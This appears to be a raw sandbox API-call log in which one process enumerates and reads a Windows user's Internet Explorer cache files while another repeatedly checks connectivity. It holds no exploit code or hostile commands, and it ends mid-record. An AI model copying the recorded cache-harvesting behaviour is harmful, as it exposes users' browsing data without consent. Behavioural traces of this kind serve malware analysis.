ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\browser[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,381 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,571 | 504 | NtReadFile |
Buffer => installing the package.
</p>
</div>
<div class="win-content" id="win-opts">
<p class="default-browser-opt">
<label><input checked id="default-cb" type="checkbox" value="set"> Set Google Chrome as
FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,581 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,581 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \xc8\x00\x00\x00\x00\x00\x00\x00pT)\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01`\xf80\x16\xe0\x91\xcf\x01\x91H\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00 \x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00J\x00Z\x00K\x00E\x00O\x00~\x001\x00.\x00E\x00O\x00T\x00c\x00J\x00Z\x00K\x00e\x00O\x00u\x00B\x00r\x00n\x004\x00k\x00E\x00R\x00x\x00q\x00t\x00a\x00U\x00H\x003\x00f\x00Y\x006\x003\x002\x003\x00m\x00H\x00U\x00Z\x00F\x00J\x00M\x00g\x00T\x00v\x00x\x00a\x00G\x002\x00i\x00E\x00[\x001\x00]\x00.\x00e\x00o\x00t\x00I\x00F\x000\x00\x80\x00\x00\x00\x00\x00\x00\x00 \xf2\xc8\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01`H\xdb\xf2\xe3\x91\xcf\x01\xc8%\x06\x00\x00\x00\x00\x00\x000\x06\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:43,591 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\conditionalbanners[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,601 | 504 | NtReadFile |
Buffer => [{id:'FIiab', f:0, r:21, eC:1, nW:0, jD:{isChecked:1}, iC:'MSFT,', bT:'Olet avannut MSN-sivuston maasta, jolla on paikallinen sivusto. Haluatko siirty\xc3\xa4 MSN Suomi -sivustoon?', cbc:'3', cbd:'30', cC:'FI', lnk1:'http://fi.msn.com/?st=1',lb1:'KYLL\xc3\x84', lnk2:' FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,611 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:43,631 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\flex[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,641 | 504 | NtReadFile |
Buffer =>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">si_ST=new Date;var Conf FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,671 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:43,671 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:43,671 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016e8c8 | |
| 07:43:43,671 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016e8c8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016f300 | |
| 07:43:43,671 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:43,671 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:43,671 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:43,731 | 504 | NtReadFile |
Buffer => Unuyvsou3ErPp1srHIUnHFRp1UdsUUUIQ25GNn0oXiLPfpRRTERP8Ae/CpoflwRwef5UUULcHsapO+9gLcknd+OM/zqS4A+zvx1Q0UVhifiie1lSTo1LmIlFFFbnjH/9k=" data-fallback-src="/th?c=8&rs=2&pid=BingWidget&u=http%3A%2F%2Faz412006.vo.msecnd.net%2Fimages%2F1281356722&w FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:43,841 | 504 | NtReadFile |
Buffer => N0I963nHTUUWcBq3hm7sAWVZLi3HAlRSSo/2lHT6jj6Umk+EbnUSklw8lvannO3Dv8A7oPQe5/CqnxC164uNZS2t7mSOztkO0RsV3NyGYkdfQe31Ndf4L1i51TQIft4xdRrjcx+aWP+Fz746/n3rnVKPMauq+U6PTYoNMgiii/dQwj5Yox0Hck/zJ5Nc62onUviEJ5DiG3ikcj0ATAHt1FW/EXifTdDtktJ7qKO6mUttOTx23YHAP64rA8MtDfJN FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,011 | 504 | NtReadFile |
Buffer => =slicebox,dqs=0,nc=1,frsz=1,sz=12,rl=0','Weight': 1}],'newsrandom':[{'Name':'mixbingnowv2hashtags~fclr=3,nnews=1,frsz=1,sz=12,rl=0','Weight': 1}],'extrandomtext':[{'Name':'mixbingnowv2hashtags~l=sleek,rem=1,fclr=3,pil=8,lsixp=240,plc=1,sz=20,naf=12,frsz=1' FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,072 | 504 | NtReadFile |
Buffer => t/css'>body{background-color: ",e,";} div.br{border-right: solid 2px ",e,";} div.bb{border-bottom: solid 2px ",e,";} ",n.join("")," </style>"].join("")).appendTo("head")}}catch(v){}}function u(){var n,i;try{if(_H.color!=null&&_H.color.length>0&&_H.backgrou FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,102 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,102 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,102 | 504 | NtReadFile |
Buffer => window.google.ac.h(["ch",[["ch\u003cb\u003eipotle\u003c\/b\u003e",0],["ch\u003cb\u003ease\u003c\/b\u003e",0],["ch\u003cb\u003ease online\u003c\/b\u003e",0],["ch\u003cb\u003eeap flights\u003c\/b\u003e",0],["ch\u003cb\u003eick fil a\u003c\/b\u003e",0],["ch\u FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,102 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,102 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\f[3].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,122 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chrom,e",[["\u003cb\u003echrome\u003c\/b\u003e",0,[10],{"zb":"\u003cse\u003echrom e\u003c\/se\u003e","za":"\u003csc\u003echrome\u003c\/sc\u003e"}],["\u003cb\u003echrome\u003c\/b\u003e e\u003cb\u003extensions\u003c\/b\u003e",0,[10],{"zb FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,122 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,132 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x000~\x05c\xe5\x91\xcf\x01P\x02Xc\xe5\x91\xcf\x01P\x02Xc\xe5\x91\xcf\x01P\x02Xc\xe5\x91\xcf\x01\xd5?\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00I\x00N\x00W\x00I\x00~\x001\x00.\x00H\x00T\x00M\x00m\x00a\x00i\x00n\x00w\x00i\x00n\x00d\x00o\x00w\x00[\x001\x00]\x00.\x00h\x00t\x00m\x00\x80\x00\x00\x00\x00\x00\x00\x000\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x010\xf5w\xf2\xe3\x91\xcf\x01JF\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00A\x00I\x00N\x00W\x00I\x00~\x002\x00.\x00C\x00S\x00S\x00m\x00a\x00i\x00n\x00w\x00i\x00n\x00d\x00o\x00w\x00[\x002\x00]\x00.\x00c\x00s\x00s\x00 |
SUCCESS | 0x00000000 | |
| 07:43:44,142 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\mainwindow[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,152 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,222 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,222 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\mainwindow[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,232 | 504 | NtReadFile |
Buffer => <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
< FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,312 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,312 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\thankyou[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,332 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,472 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:44,472 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:44,472 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:44,472 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:44,482 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:44,672 | 504 | NtReadFile |
Buffer => src="//www.google.com/tools/dlpage/res/chrome/images/chrome_throbber_fast_16.gif"></span>
</div>
</div><script src="/intl/en/chrome/assets/common/js/chrome.min.js">
</script> <script src="/intl/en/chrome/assets/common/js/installer.min.js">
</scr FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,682 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:44,682 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00\xb0\xf1\xe3\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xe0x\xe5\x12\xe0\x91\xcf\x01\xab8\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00T\x00I\x00F\x00F\x00A\x00N\x00~\x001\x00.\x00C\x00S\x00S\x00t\x00i\x00f\x00f\x00a\x00n\x00y\x00[\x001\x00]\x00.\x00c\x00s\x00s\x00h\x00t\x00m\x00x\x00\x00\x00\x00\x00\x00\x000\xd3\x9c\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x01P\xfe\xa5\xf3\xdf\x91\xcf\x010\x83\x01\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x16\x00W\x00I\x00D\x00G\x00E\x00T\x00~\x001\x00.\x00J\x00S\x00\x00\x00w\x00i\x00d\x00g\x00e\x00t\x00s\x00[\x001\x00]\x00.\x00j\x00s\x00\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:43:44,682 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:44,682 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:44,763 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:44,763 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => h\x00\x00\x00\x00\x00\x00\x00@|[\xb9\xd5I\xcd\x01\x90i`(\xf2\x91\xcf\x01`= \x86\xe6\x91\xcf\x01`= \x86\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00f\x00f\x00a\x00\xa8\x00\x00\x00\x00\x00\x00\x00P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01P\xec\x04\xf0\xdf\x91\xcf\x01\x02#\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00\x18\x001\x008\x007\x00A\x009\x006\x00~\x001\x00.\x00P\x00N\x00G\x001\x008\x007\x00a\x009\x006\x007\x003\x00b\x004\x006\x00f\x005\x000\x00b\x00e\x00f\x006\x00d\x00c\x00f\x004\x00f\x006\x000\x00a\x00a\x000\x00d\x00 |
SUCCESS | 0x00000000 | |
| 07:43:44,763 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\details[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,783 | 504 | NtReadFile |
Buffer => \xef\xbb\xbf<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="robots" content="noodp,noy FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,843 | 504 | NtReadFile |
Buffer => osoft.com/?WT.mc_id=MSCOM_EN_US_HP_MODHOME_131Z4ENUS21977" bi:linkid="Modules_For home_Support_Microsoft Support home" bi:index="0">Find more support</a></li><li id="c820ee4b-54dd-e469-ea5e-2266d76ef4cb"><a id="8804d3db-2f2b-ea69-48df-b4b08eec4899" target= FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:44,923 | 504 | NtReadFile |
Buffer => iv class="moreinfo-desc"><p><span class="loc" locid="9cbcac33-5222-831e-9b25-b79a64bf9be1" srcid="9cbcac33-5222-831e-9b25-b79a64bf9be1">Generally, a download manager enables downloading of large files or multiples files in one session.</span><span class="l FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,013 | 504 | NtReadFile |
Buffer => wnload/details.aspx?id=17718&134b2bb0-86c1-fe9f-d523-281faef41695=1" bi:track="false"><img src="http://c.s-microsoft.com/en-us/CMSImages/info_tip_16x16.png?version=8dd2a4cb-59c7-14a4-2abf-d78d79c815a3" class="mscom-image" alt="More Information" width=" FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,073 | 504 | NtReadFile |
Buffer => mscom-link" href="http://windows.microsoft.com/en-us/internet-explorer/download-ie" bi:linkid="92" bi:index="3">Web browser</a></li><li id="8fcf7307-4145-41c0-a593-7a93b2d7f660"><a id="0724f8bf-3e37-4098-b7bd-ba25367d2b82" target="_self" class="mscom-link" FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,093 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:45,093 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\details[2].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,123 | 504 | NtReadFile |
Buffer => \xef\xbb\xbf<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="robots" content="noodp,noy FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,183 | 504 | NtReadFile |
Buffer => d341-5d25-983130b60b3d" target="_self" class="mscom-link" href="http://support.microsoft.com/?WT.mc_id=MSCOM_EN_US_HP_MODHOME_131Z4ENUS21977" bi:linkid="Modules_For home_Support_Microsoft Support home" bi:index="0">Find more support</a></li><li id="c820ee4 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,243 | 504 | NtReadFile |
Buffer => ></p><p><span class="loc" locid="2aa866d9-1372-ffaa-83ca-503b9dd1caf9" srcid="2aa866d9-1372-ffaa-83ca-503b9dd1caf9">Microsoft Download Manager is free and available for download now.</span></p></div></div></div></div></div></div></div></div><div class="wiz FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,283 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:45,283 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:45,283 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:45,283 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:45,283 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:45,363 | 504 | NtReadFile |
Buffer => div></div></div></div></div></div></div><div class="row-fluid" data-cols="1" data-view1="1" data-view2="1" data-view3="1" data-view4="1"><div class="span bp0-col-1-1 bp1-col-1-1 bp2-col-1-1 bp3-col-1-1">
<script type="text/javascript">/*<![CDATA[* FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,413 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:45,423 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\eula_text[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,544 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html class="no-js consumer" lang="en">
<head>
<script>
(function(e, p){
var m = location.href.match(/platform=(win8|win|mac|linux|cros)/);
e.id = (m && m[1]) ||
(p.indexOf('Windows NT 6.2') > -1 ? 'win8' : p.index FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,684 | 504 | NtReadFile |
Buffer => <p>
Google Chrome may include one or more components provided by Adobe Systems Incorporated
and Adobe Software Ireland Limited (collectively \xe2\x80\x9cAdobe\xe2\x80\x9d). Your use of the Adobe software
as provided by Google (\xe2\x80\x9cAdobe So FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,744 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:45,744 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000184 FileInformation => \xa8\x00\x00\x00\x00\x00\x00\x00\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xa0\xd2\xad\xef\xdf\x91\xcf\x01\xd9\x15\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00J\x00\x00\x00\x00\x00\x00\x00\x18\x00F\x001\x001\x007\x003\x009\x00~\x001\x00.\x00J\x00P\x00G\x00F\x001\x001\x007\x003\x009\x003\x00A\x00E\x00B\x004\x000\x00C\x00D\x008\x009\x00D\x00C\x00F\x001\x001\x00D\x005\x002\x006\x002\x005\x000\x008\x00E\x00[\x001\x00]\x00.\x00j\x00p\x00g\x00\xa8\x00\x00\x00\x00\x00\x00\x00\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01\xd0s~\xef\xdf\x91\xcf\x01C\x15\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00F\x00\x00\x00\x00\x00\x00\x00\x18\x00F\x006\x00D\x009\x007\x006\x00~\x001\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:45,744 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\flex[1].htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,774 | 504 | NtReadFile |
Buffer =>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascript">si_ST=new Date;var Conf FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,864 | 504 | NtReadFile |
Buffer => syb69M0xVkZV42qTnbUclxLE4O8h+nHpV+e6ivJIHW3CyxRbJVJ7jvVBJhLO+F3Y6DHShuzLjG+g64vHeDMk29gR8rA5p9qzyW88vlnhcZA4qaG8EdsYHt4zyW3EfNUME0hjaKFXYOcBUGSfoKSle5UqfLbUqWsTPOTCAZMcDtVmyhV9StUwQZJlVlI9+a0IdLurO2Zrm0lt3c4QyjB/D8xWno1pALuKW7YPIuQjkYCHpnA/zzWqoznFyirolRd0 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:45,944 | 504 | NtReadFile |
Buffer => Y9z8RiBuUi1I6HSPKRajHl1B9cbmhuMTsR+ZpcozByFZz1/1LqIG52UwndCjtdRsFen0Jqaf6Vm2krdVOyhcTVMki7fignT6o6abLZ54zGi+/Rr19w9TT0079na1Ge1MdJeMB2s4lqcfppdbmn1HDUCM1euIGE4Vxr5iEDrT7olhL8K7j3ZddjzNB4kw1E7IJxTk7DNFUnJaZaySfcjFaCMXo2ELRrlG7lHeNmRYxpvOEO1JMpDiLrwBzHHMj7wr FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,014 | 504 | NtReadFile |
Buffer =>
<div class="elc">Altidore out</div>
<div class="elc">again</div>
<div class="news"> <div c FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,084 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:46,084 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:46,084 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:46,084 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:46,084 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:46,235 | 504 | NtReadFile |
Buffer => DATA=",p=location.hostname.match(/([^.]+\.[^.]*)$/);i==""&&p&&(i="http://a4."+p[0]),n.ping=new Image,n.Log=function(n,t,i,u){w||(l("Init","CI","Base",!1),o=sb_st(r,v),w=1,sj_be(_w,"beforeunload",r,!1)),l(n,t,i,u,[].slice.apply(arguments).slice(4))},n.Rende FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,285 | 504 | NtReadFile |
Buffer => argedFeed();var r=i.widgetsArray[i.activeWidgetIndex];i.jqWidgets.length>1&&r.LastPageIndex+1>=r.MaxPages?(i.AnimateWidget(i.GetRightWidgetIndex(),n),i.widgetsArray[i.activeWidgetIndex].LastPageIndex=0):i.AnimateFeeds(i.GetRightFeedContent(),t,!0)},i.Anima FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,305 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000180 |
FAILURE | 3221225489 | |
| 07:43:46,305 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\f[2].txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,305 | 504 | NtReadFile |
Buffer => window.google.ac.h(["chro",[["chro\u003cb\u003eme\u003c\/b\u003e",0],["chro\u003cb\u003emecast\u003c\/b\u003e",0],["chro\u003cb\u003emecast apps\u003c\/b\u003e",0],["chro\u003cb\u003eme store\u003c\/b\u003e",0],["chro\u003cb\u003emebook\u003c\/b\u003e",0], FileHandle => 0x00000180 |
SUCCESS | 0x00000000 | |
| 07:43:46,315 | 504 | NtReadFile |
